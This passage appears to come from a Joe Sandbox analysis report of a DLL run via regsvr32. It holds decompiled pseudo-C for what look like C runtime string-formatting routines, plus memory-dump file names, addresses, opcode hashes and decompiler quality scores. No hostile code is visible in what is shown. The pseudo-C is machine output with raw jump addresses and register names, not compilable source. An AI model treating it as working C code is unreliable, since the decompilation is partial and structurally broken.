                                                                      				 *_t303 =  *_t303 + r8d;
                                                                      				goto 0x80009415;
                                                                      				_v88 =  *((intOrPtr*)(_t282 + 8));
                                                                      				_t289 = _t327;
                                                                      				E00000001180008438(_t282, _t289,  *((intOrPtr*)(_t282 + 0x40)), _t306 + 2, _t310, _t303);
                                                                      				if ( *_t303 < 0) goto 0x80009476;
                                                                      				if ((r13b &  *(_t282 + 0x28) >> 0x00000002) == 0) goto 0x80009476;
                                                                      				if (r15d <= 0) goto 0x80009476;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x80009448;
                                                                      				if ( *((long long*)( *_t327 + 8)) == 0) goto 0x8000945d;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *_t327 + 8)),  *_t327) == 0xffffffff) goto 0x80009473;
                                                                      				 *_t303 = _t289 + 1;
                                                                      				if ( *_t303 == 0xfffffffe) goto 0x80009476;
                                                                      				if (0 + r13d - r15d < 0) goto 0x80009430;
                                                                      				goto 0x80009476;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				return E00000001180002FB0(r13b,  *_t303, _v56 ^ _t311 - 0x00000050);
                                                                      			}



























                                                                      0x180009070
                                                                      0x180009070
                                                                      0x180009075
                                                                      0x18000907a
                                                                      0x180009088
                                                                      0x18000908f
                                                                      0x180009099
                                                                      0x18000909d
                                                                      0x1800090a0
                                                                      0x1800090a3
                                                                      0x1800090a9
                                                                      0x1800090ac
                                                                      0x1800090af
                                                                      0x1800090b2
                                                                      0x1800090b4
                                                                      0x1800090b6
                                                                      0x1800090bf
                                                                      0x1800090c7
                                                                      0x1800090cb
                                                                      0x1800090d3
                                                                      0x1800090db
                                                                      0x1800090e0
                                                                      0x1800090e4
                                                                      0x1800090e8
                                                                      0x1800090f0
                                                                      0x1800090f8
                                                                      0x1800090fd
                                                                      0x180009102
                                                                      0x180009107
                                                                      0x18000910c
                                                                      0x180009111
                                                                      0x180009115
                                                                      0x180009119
                                                                      0x18000911d
                                                                      0x180009121
                                                                      0x180009125
                                                                      0x180009129
                                                                      0x18000912d
                                                                      0x180009132
                                                                      0x180009136
                                                                      0x180009138
                                                                      0x18000913d
                                                                      0x18000913f
                                                                      0x180009146
                                                                      0x18000914d
                                                                      0x18000914f
                                                                      0x18000915a
                                                                      0x18000915c
                                                                      0x180009160
                                                                      0x180009168
                                                                      0x18000916d
                                                                      0x18000916f
                                                                      0x180009174
                                                                      0x180009176
                                                                      0x18000917c
                                                                      0x180009181
                                                                      0x18000918a
                                                                      0x18000918e
                                                                      0x180009197
                                                                      0x18000919d
                                                                      0x1800091a2
                                                                      0x1800091a8
                                                                      0x1800091b3
                                                                      0x1800091bd
                                                                      0x1800091bf
                                                                      0x1800091c3
                                                                      0x1800091c8
                                                                      0x1800091ca
                                                                      0x1800091ce
                                                                      0x1800091d7
                                                                      0x1800091d9
                                                                      0x1800091dd
                                                                      0x1800091e0
                                                                      0x1800091ea
                                                                      0x1800091f4
                                                                      0x1800091f6
                                                                      0x1800091f9
                                                                      0x1800091fb
                                                                      0x18000920b
                                                                      0x18000920f
                                                                      0x180009211
                                                                      0x180009219
                                                                      0x18000921e
                                                                      0x180009220
                                                                      0x180009223
                                                                      0x18000922c
                                                                      0x180009230
                                                                      0x180009234
                                                                      0x18000923a
                                                                      0x180009245
                                                                      0x180009257
                                                                      0x180009265
                                                                      0x18000927e
                                                                      0x180009286
                                                                      0x18000928c
                                                                      0x180009294
                                                                      0x180009296
                                                                      0x180009298
                                                                      0x1800092a0
                                                                      0x1800092a0
                                                                      0x1800092aa
                                                                      0x1800092aa
                                                                      0x1800092b7
                                                                      0x1800092c1
                                                                      0x1800092c3
                                                                      0x1800092c5
                                                                      0x1800092c7
                                                                      0x1800092cf
                                                                      0x1800092d3
                                                                      0x1800092d6
                                                                      0x1800092d9
                                                                      0x1800092de
                                                                      0x1800092e9
                                                                      0x1800092f1
                                                                      0x1800092fc
                                                                      0x18000930a
                                                                      0x180009314
                                                                      0x180009329
                                                                      0x180009330
                                                                      0x180009335
                                                                      0x18000933d
                                                                      0x18000933f
                                                                      0x180009341
                                                                      0x180009348
                                                                      0x180009352
                                                                      0x180009362
                                                                      0x180009366
                                                                      0x18000936b
                                                                      0x18000936f
                                                                      0x180009378
                                                                      0x18000937e
                                                                      0x18000938a
                                                                      0x18000938c
                                                                      0x180009393
                                                                      0x1800093a5
                                                                      0x1800093af
                                                                      0x1800093b1
                                                                      0x1800093b4
                                                                      0x1800093b6
                                                                      0x1800093be
                                                                      0x1800093c5
                                                                      0x1800093d0
                                                                      0x1800093d2
                                                                      0x1800093d4
                                                                      0x1800093d7
                                                                      0x1800093e0
                                                                      0x1800093f1
                                                                      0x1800093fb
                                                                      0x1800093fd
                                                                      0x180009400
                                                                      0x180009402
                                                                      0x18000940d
                                                                      0x180009410
                                                                      0x180009418
                                                                      0x180009423
                                                                      0x18000942e
                                                                      0x18000943c
                                                                      0x180009446
                                                                      0x18000945b
                                                                      0x180009462
                                                                      0x180009467
                                                                      0x18000946f
                                                                      0x180009471
                                                                      0x180009473
                                                                      0x1800094a2

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 02d61a085ae73c056e3ef3320fc3054e06dabf99c843fb1d5221172585469cc9
                                                                      • Instruction ID: b7205cd54bcea9cd6da5818c78c89c9828aa496c281d25a89fb4750049bd2a04
                                                                      • Opcode Fuzzy Hash: 02d61a085ae73c056e3ef3320fc3054e06dabf99c843fb1d5221172585469cc9
                                                                      • Instruction Fuzzy Hash: 8FE1EE7220664D86EBAACBA9C4483EE37A1E74DBC8F15C215EE45473D9CF31CA4AC701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0000000118000BF8C(long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t120;
                                                                      				void* _t123;
                                                                      				unsigned int _t164;
                                                                      				signed char _t165;
                                                                      				unsigned int _t172;
                                                                      				intOrPtr _t191;
                                                                      				void* _t199;
                                                                      				signed long long _t266;
                                                                      				void* _t282;
                                                                      				intOrPtr* _t286;
                                                                      				intOrPtr* _t289;
                                                                      				signed int* _t303;
                                                                      				void* _t306;
                                                                      				void* _t310;
                                                                      				void* _t311;
                                                                      				void* _t325;
                                                                      				intOrPtr* _t327;
                                                                      
                                                                      				_t305 = __rsi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t310 = _t311;
                                                                      				_t266 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t266 ^ _t311 - 0x00000050;
                                                                      				_t120 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t282 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t199 = _t120 - 0x64;
                                                                      				if (_t199 > 0) goto 0x8000c02f;
                                                                      				if (_t199 == 0) goto 0x8000c092;
                                                                      				if (_t120 == r15b) goto 0x8000c09f;
                                                                      				if (_t120 == 0x43) goto 0x8000c012;
                                                                      				if (_t120 - 0x44 <= 0) goto 0x8000c0a8;
                                                                      				if (_t120 - 0x47 <= 0) goto 0x8000c09f;
                                                                      				if (_t120 == 0x53) goto 0x8000c054;
                                                                      				if (_t120 == r14b) goto 0x8000c025;
                                                                      				if (_t120 == 0x5a) goto 0x8000c01e;
                                                                      				if (_t120 == 0x61) goto 0x8000c09f;
                                                                      				if (_t120 != 0x63) goto 0x8000c0a8;
                                                                      				E0000000118000C3C8(_t120, _t120 - 0x63, __rcx);
                                                                      				goto 0x8000c0a4;
                                                                      				E0000000118000C48C(__rcx);
                                                                      				goto 0x8000c0a4;
                                                                      				_t123 = E0000000118001D854(r13b, __rcx, __rcx, __rsi, _t310);
                                                                      				goto 0x8000c0a4;
                                                                      				if (_t123 - 0x67 <= 0) goto 0x8000c09f;
                                                                      				if (_t123 == 0x69) goto 0x8000c092;
                                                                      				if (_t123 == 0x6e) goto 0x8000c08b;
                                                                      				if (_t123 == 0x6f) goto 0x8000c06b;
                                                                      				if (_t123 == 0x70) goto 0x8000c05b;
                                                                      				if (_t123 == 0x73) goto 0x8000c054;
                                                                      				if (_t123 == 0x75) goto 0x8000c096;
                                                                      				if (_t123 != dil) goto 0x8000c0a8;
                                                                      				goto 0x8000c028;
                                                                      				E0000000118000C504(__rcx);
                                                                      				goto 0x8000c0a4;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8000c025;
                                                                      				_t164 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t164 >> 0x00000005) == 0) goto 0x8000c07f;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t164;
                                                                      				E0000000118001DA3C(0, __rcx, __rcx, _t305, _t310);
                                                                      				goto 0x8000c0a4;
                                                                      				E0000000118000C84C(__rcx, __rcx);
                                                                      				goto 0x8000c0a4;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001DC24(0, __rcx, __rcx, _t305, _t310);
                                                                      				goto 0x8000c0a4;
                                                                      				if (E0000000118000C5A8(0, __rcx, __rcx, _t305, _t310) != 0) goto 0x8000c0af;
                                                                      				goto 0x8000c395;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8000c392;
                                                                      				_t165 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8000c0fc;
                                                                      				if ((r13b & 0) == 0) goto 0x8000c0e1;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8000c0f9;
                                                                      				if ((r13b & _t165) == 0) goto 0x8000c0ec;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8000c0f9;
                                                                      				if ((r13b & 0) == 0) goto 0x8000c0fc;
                                                                      				_v72 = 0x20;
                                                                      				_t306 = _t325;
                                                                      				_t191 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t191 - r14b & 0x000000df) != 0) goto 0x8000c117;
                                                                      				if ((r13b & _t165 >> 0x00000005) == 0) goto 0x8000c117;
                                                                      				r8b = r13b;
                                                                      				goto 0x8000c11a;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x8000c12d;
                                                                      				if ((_t191 - r15b & 0xffffff00 | (_t191 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8000c148;
                                                                      				 *((char*)(_t310 + _t306 - 0x20)) = 0x30;
                                                                      				if (_t191 == r14b) goto 0x8000c13c;
                                                                      				if (_t191 != r15b) goto 0x8000c13f;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t310 + _t306 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t165 & 0x0000000c) != 0) goto 0x8000c1b8;
                                                                      				if (r15d <= 0) goto 0x8000c1b8;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8000c183;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8000c19c;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x8000c1b4;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8000c1b8;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000c163;
                                                                      				goto 0x8000c1b8;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t60 = _t282 + 0x460; // 0x4a1
                                                                      				_t327 = _t60;
                                                                      				_t61 = _t282 + 0x20; // 0x61
                                                                      				_t303 = _t61;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x8000c1e3;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x8000c1e3;
                                                                      				 *_t303 =  *_t303;
                                                                      				goto 0x8000c1fa;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t67 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t286 = _t327;
                                                                      				E00000001180008438(__rcx, _t286, _t67, _t306 + 2, _t310, _t303);
                                                                      				_t172 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t172 >> 0x00000003) == 0) goto 0x8000c260;
                                                                      				if ((r13b & _t172 >> 0x00000002) != 0) goto 0x8000c260;
                                                                      				if (r15d <= 0) goto 0x8000c260;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x8000c232;
                                                                      				if ( *((long long*)( *_t327 + 8)) == 0) goto 0x8000c247;
                                                                      				if (E0000000118003EF10(0x30,  *((long long*)( *_t327 + 8)),  *_t327) == 0xffffffff) goto 0x8000c25d;
                                                                      				 *_t303 = _t286 + 1;
                                                                      				if ( *_t303 == 0xfffffffe) goto 0x8000c260;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000c21a;
                                                                      				goto 0x8000c260;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8000c2f5;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8000c2f5;
                                                                      				_t83 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t84 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E0000000118003E4FC( *((intOrPtr*)(__rcx + 8)), __rcx, _t84, _t83, _t310,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8000c2f0;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8000c2f0;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x8000c2d2;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x8000c2d2;
                                                                      				 *_t303 =  *_t303 + r8d;
                                                                      				goto 0x8000c2e6;
                                                                      				_v88 =  *((intOrPtr*)(_t282 + 8));
                                                                      				_t96 =  &_v68; // -27
                                                                      				E00000001180008438(_t282, _t327, _t96, _t306 + 2, _t310, _t303);
                                                                      				if (0 + r13d !=  *(_t282 + 0x48)) goto 0x8000c27a;
                                                                      				goto 0x8000c331;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				goto 0x8000c331;
                                                                      				r8d =  *(_t282 + 0x48);
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x8000c31e;
                                                                      				if ( *((long long*)( *_t327 + 8)) != 0) goto 0x8000c31e;
                                                                      				 *_t303 =  *_t303 + r8d;
                                                                      				goto 0x8000c331;
                                                                      				_v88 =  *((intOrPtr*)(_t282 + 8));
                                                                      				_t289 = _t327;
                                                                      				E00000001180008438(_t282, _t289,  *((intOrPtr*)(_t282 + 0x40)), _t306 + 2, _t310, _t303);
                                                                      				if ( *_t303 < 0) goto 0x8000c392;
                                                                      				if ((r13b &  *(_t282 + 0x28) >> 0x00000002) == 0) goto 0x8000c392;
                                                                      				if (r15d <= 0) goto 0x8000c392;
                                                                      				if ((r13b &  *( *_t327 + 0x14) >> 0x0000000c) == 0) goto 0x8000c364;
                                                                      				if ( *((long long*)( *_t327 + 8)) == 0) goto 0x8000c379;
                                                                      				if (E0000000118003EF10(0x20,  *((long long*)( *_t327 + 8)),  *_t327) == 0xffffffff) goto 0x8000c38f;
                                                                      				 *_t303 = _t289 + 1;
                                                                      				if ( *_t303 == 0xfffffffe) goto 0x8000c392;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8000c34c;
                                                                      				goto 0x8000c392;
                                                                      				 *_t303 =  *_t303 | 0xffffffff;
                                                                      				return E00000001180002FB0(r13b,  *_t303, _v56 ^ _t311 - 0x00000050);
                                                                      			}



























                                                                      0x18000bf8c
                                                                      0x18000bf8c
                                                                      0x18000bf91
                                                                      0x18000bf96
                                                                      0x18000bfa4
                                                                      0x18000bfab
                                                                      0x18000bfb5
                                                                      0x18000bfb9
                                                                      0x18000bfbc
                                                                      0x18000bfbf
                                                                      0x18000bfc5
                                                                      0x18000bfc8
                                                                      0x18000bfcb
                                                                      0x18000bfce
                                                                      0x18000bfd0
                                                                      0x18000bfd2
                                                                      0x18000bfdb
                                                                      0x18000bfe3
                                                                      0x18000bfe7
                                                                      0x18000bfef
                                                                      0x18000bff7
                                                                      0x18000bffc
                                                                      0x18000c000
                                                                      0x18000c004
                                                                      0x18000c00c
                                                                      0x18000c014
                                                                      0x18000c019
                                                                      0x18000c01e
                                                                      0x18000c023
                                                                      0x18000c028
                                                                      0x18000c02d
                                                                      0x18000c031
                                                                      0x18000c035
                                                                      0x18000c039
                                                                      0x18000c03d
                                                                      0x18000c041
                                                                      0x18000c045
                                                                      0x18000c049
                                                                      0x18000c04e
                                                                      0x18000c052
                                                                      0x18000c054
                                                                      0x18000c059
                                                                      0x18000c05b
                                                                      0x18000c062
                                                                      0x18000c069
                                                                      0x18000c06b
                                                                      0x18000c076
                                                                      0x18000c078
                                                                      0x18000c07c
                                                                      0x18000c084
                                                                      0x18000c089
                                                                      0x18000c08b
                                                                      0x18000c090
                                                                      0x18000c092
                                                                      0x18000c098
                                                                      0x18000c09d
                                                                      0x18000c0a6
                                                                      0x18000c0aa
                                                                      0x18000c0b3
                                                                      0x18000c0b9
                                                                      0x18000c0be
                                                                      0x18000c0c4
                                                                      0x18000c0cf
                                                                      0x18000c0d9
                                                                      0x18000c0db
                                                                      0x18000c0df
                                                                      0x18000c0e4
                                                                      0x18000c0e6
                                                                      0x18000c0ea
                                                                      0x18000c0f3
                                                                      0x18000c0f5
                                                                      0x18000c0f9
                                                                      0x18000c0fc
                                                                      0x18000c106
                                                                      0x18000c110
                                                                      0x18000c112
                                                                      0x18000c115
                                                                      0x18000c117
                                                                      0x18000c127
                                                                      0x18000c12b
                                                                      0x18000c12d
                                                                      0x18000c135
                                                                      0x18000c13a
                                                                      0x18000c13c
                                                                      0x18000c13f
                                                                      0x18000c148
                                                                      0x18000c14c
                                                                      0x18000c150
                                                                      0x18000c156
                                                                      0x18000c161
                                                                      0x18000c173
                                                                      0x18000c181
                                                                      0x18000c19a
                                                                      0x18000c1a2
                                                                      0x18000c1a8
                                                                      0x18000c1b0
                                                                      0x18000c1b2
                                                                      0x18000c1b4
                                                                      0x18000c1bc
                                                                      0x18000c1bc
                                                                      0x18000c1c6
                                                                      0x18000c1c6
                                                                      0x18000c1d3
                                                                      0x18000c1dd
                                                                      0x18000c1df
                                                                      0x18000c1e1
                                                                      0x18000c1e3
                                                                      0x18000c1eb
                                                                      0x18000c1ef
                                                                      0x18000c1f2
                                                                      0x18000c1f5
                                                                      0x18000c1fa
                                                                      0x18000c205
                                                                      0x18000c20d
                                                                      0x18000c218
                                                                      0x18000c226
                                                                      0x18000c230
                                                                      0x18000c245
                                                                      0x18000c24c
                                                                      0x18000c251
                                                                      0x18000c259
                                                                      0x18000c25b
                                                                      0x18000c25d
                                                                      0x18000c264
                                                                      0x18000c26e
                                                                      0x18000c27e
                                                                      0x18000c282
                                                                      0x18000c287
                                                                      0x18000c28b
                                                                      0x18000c294
                                                                      0x18000c29a
                                                                      0x18000c2a6
                                                                      0x18000c2a8
                                                                      0x18000c2af
                                                                      0x18000c2c1
                                                                      0x18000c2cb
                                                                      0x18000c2cd
                                                                      0x18000c2d0
                                                                      0x18000c2d2
                                                                      0x18000c2da
                                                                      0x18000c2e1
                                                                      0x18000c2ec
                                                                      0x18000c2ee
                                                                      0x18000c2f0
                                                                      0x18000c2f3
                                                                      0x18000c2fc
                                                                      0x18000c30d
                                                                      0x18000c317
                                                                      0x18000c319
                                                                      0x18000c31c
                                                                      0x18000c31e
                                                                      0x18000c329
                                                                      0x18000c32c
                                                                      0x18000c334
                                                                      0x18000c33f
                                                                      0x18000c34a
                                                                      0x18000c358
                                                                      0x18000c362
                                                                      0x18000c377
                                                                      0x18000c37e
                                                                      0x18000c383
                                                                      0x18000c38b
                                                                      0x18000c38d
                                                                      0x18000c38f
                                                                      0x18000c3be

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 20b033801c49182d9537e86e361cde320a84f2ecf89bcb9e07578e8e7f789cc6
                                                                      • Instruction ID: e9c03c1a5b50420a46421e0089b0b0436abde6f687efdf0d184a840848b4e0ac
                                                                      • Opcode Fuzzy Hash: 20b033801c49182d9537e86e361cde320a84f2ecf89bcb9e07578e8e7f789cc6
                                                                      • Instruction Fuzzy Hash: D7E1CC3220064C86EBAACB698544BEE37A1E70DBD8F18C215EE45577D6CF35CA4AC302
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E00000001180018598(long long __rbx, long long __rcx, long long __rsi, long long __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				short _v64;
                                                                      				short _v68;
                                                                      				signed short _v72;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				signed int _t126;
                                                                      				void* _t129;
                                                                      				void* _t161;
                                                                      				unsigned int _t168;
                                                                      				signed char _t169;
                                                                      				signed int _t180;
                                                                      				signed short _t192;
                                                                      				void* _t195;
                                                                      				void* _t199;
                                                                      				signed long long _t262;
                                                                      				long long _t280;
                                                                      				intOrPtr* _t282;
                                                                      				long long _t283;
                                                                      				intOrPtr* _t285;
                                                                      				intOrPtr _t289;
                                                                      				intOrPtr* _t291;
                                                                      				signed long long _t296;
                                                                      				intOrPtr _t299;
                                                                      				intOrPtr _t301;
                                                                      				void* _t303;
                                                                      				signed int* _t304;
                                                                      				long long _t307;
                                                                      				void* _t309;
                                                                      				signed long long _t310;
                                                                      				intOrPtr _t313;
                                                                      				signed long long _t320;
                                                                      				void* _t321;
                                                                      				intOrPtr* _t323;
                                                                      
                                                                      				_t307 = __rbp;
                                                                      				_t305 = __rsi;
                                                                      				_t282 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_a32 = __rsi;
                                                                      				_t310 = _t309 - 0x50;
                                                                      				_t262 =  *0x80072078; // 0xc949cbcab002
                                                                      				_v56 = _t262 ^ _t310;
                                                                      				_t126 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                      				_t280 = __rcx;
                                                                      				_t6 = _t303 - 0x20; // 0x58
                                                                      				_t192 = _t6;
                                                                      				_t7 = _t303 - 0x77; // 0x1
                                                                      				r12d = _t7;
                                                                      				_t199 = _t126 - 0x64;
                                                                      				if (_t199 > 0) goto 0x8001864e;
                                                                      				if (_t199 == 0) goto 0x800186bf;
                                                                      				if (_t126 == 0x41) goto 0x800186cc;
                                                                      				if (_t126 == 0x43) goto 0x8001862b;
                                                                      				if (_t126 - 0x44 <= 0) goto 0x800186d7;
                                                                      				if (_t126 - 0x47 <= 0) goto 0x800186cc;
                                                                      				if (_t126 == 0x53) goto 0x80018681;
                                                                      				if (_t126 == _t192) goto 0x80018641;
                                                                      				if (_t126 == 0x5a) goto 0x80018637;
                                                                      				if (_t126 == 0x61) goto 0x800186cc;
                                                                      				if (_t126 != 0x63) goto 0x800186d7;
                                                                      				E00000001180018A14(__rcx, __rcx, __rsi, __rbp, __r8);
                                                                      				goto 0x800186d1;
                                                                      				E00000001180018B0C(__rcx, __rcx, _t305);
                                                                      				goto 0x800186d1;
                                                                      				_t129 = E00000001180019AE4(r12b, _t192, _t280, _t282, _t303, _t305);
                                                                      				goto 0x800186d1;
                                                                      				if (_t129 - 0x67 <= 0) goto 0x800186cc;
                                                                      				if (_t129 == 0x69) goto 0x800186bf;
                                                                      				if (_t129 == 0x6e) goto 0x800186b8;
                                                                      				if (_t129 == 0x6f) goto 0x80018698;
                                                                      				if (_t129 == 0x70) goto 0x80018688;
                                                                      				if (_t129 == 0x73) goto 0x80018681;
                                                                      				if (_t129 == 0x75) goto 0x800186c3;
                                                                      				if (_t129 != 0x78) goto 0x800186d7;
                                                                      				goto 0x80018644;
                                                                      				E00000001180018BA4(_t280, _t282, _t305, _t307);
                                                                      				goto 0x800186d1;
                                                                      				 *((intOrPtr*)(_t282 + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(_t282 + 0x34)) = 0xb;
                                                                      				goto 0x80018641;
                                                                      				_t168 =  *(_t282 + 0x28);
                                                                      				if ((r12b & _t168 >> 0x00000005) == 0) goto 0x800186ac;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(_t280 + 0x28) = _t168;
                                                                      				_t283 = _t280;
                                                                      				E00000001180019D14(0, _t192, _t280, _t283, _t303, _t305);
                                                                      				goto 0x800186d1;
                                                                      				E00000001180018FBC(_t283);
                                                                      				goto 0x800186d1;
                                                                      				 *(_t283 + 0x28) =  *(_t283 + 0x28) | 0x00000010;
                                                                      				E00000001180019F44(0, _t192, _t280, _t283, _t303, _t305);
                                                                      				goto 0x800186d1;
                                                                      				if (E00000001180018CD0(0, r12b & _t168 >> 0x00000005, _t280, _t283, _t307) != 0) goto 0x800186de;
                                                                      				goto 0x800189df;
                                                                      				if ( *((intOrPtr*)(_t280 + 0x474)) != 2) goto 0x800186f4;
                                                                      				if ( *((intOrPtr*)(_t280 + 0x470)) == r12d) goto 0x800189dc;
                                                                      				if ( *((intOrPtr*)(_t280 + 0x38)) != bpl) goto 0x800189dc;
                                                                      				_t169 =  *(_t280 + 0x28);
                                                                      				_v68 = 0;
                                                                      				_v64 = 0;
                                                                      				r13d = 0x20;
                                                                      				if ((r12b & 0) == 0) goto 0x80018752;
                                                                      				if ((r12b & 0) == 0) goto 0x80018734;
                                                                      				_t26 = _t321 + 0xd; // 0xd
                                                                      				_v68 = _t26;
                                                                      				goto 0x8001874f;
                                                                      				if ((r12b & _t169) == 0) goto 0x80018740;
                                                                      				goto 0x8001872d;
                                                                      				if ((r12b & 0) == 0) goto 0x80018752;
                                                                      				_v68 = r13w;
                                                                      				_t296 = _t320;
                                                                      				r8d =  *(_t280 + 0x3a) & 0x0000ffff;
                                                                      				r10d = 0xffdf;
                                                                      				if ((r10w & (r8w & 0xffffffff) - _t192) != 0) goto 0x80018777;
                                                                      				r9b = r12b;
                                                                      				if ((r12b & 0) != 0) goto 0x8001877a;
                                                                      				r9b = bpl;
                                                                      				r15d = 0x30;
                                                                      				if (r9b != 0) goto 0x80018794;
                                                                      				if (0 == 0) goto 0x800187b3;
                                                                      				 *((intOrPtr*)(_t310 + 0x34 + _t296 * 2)) = r15w;
                                                                      				if (r8w == _t192) goto 0x800187a7;
                                                                      				if (r8w != 0x41) goto 0x800187aa;
                                                                      				 *((short*)(_t310 + 0x36 + _t296 * 2)) = _t192 & 0x0000ffff;
                                                                      				_t195 =  *((intOrPtr*)(_t280 + 0x2c)) -  *(_t280 + 0x48);
                                                                      				if ((_t169 & 0x0000000c) != 0) goto 0x80018820;
                                                                      				r9d = 0;
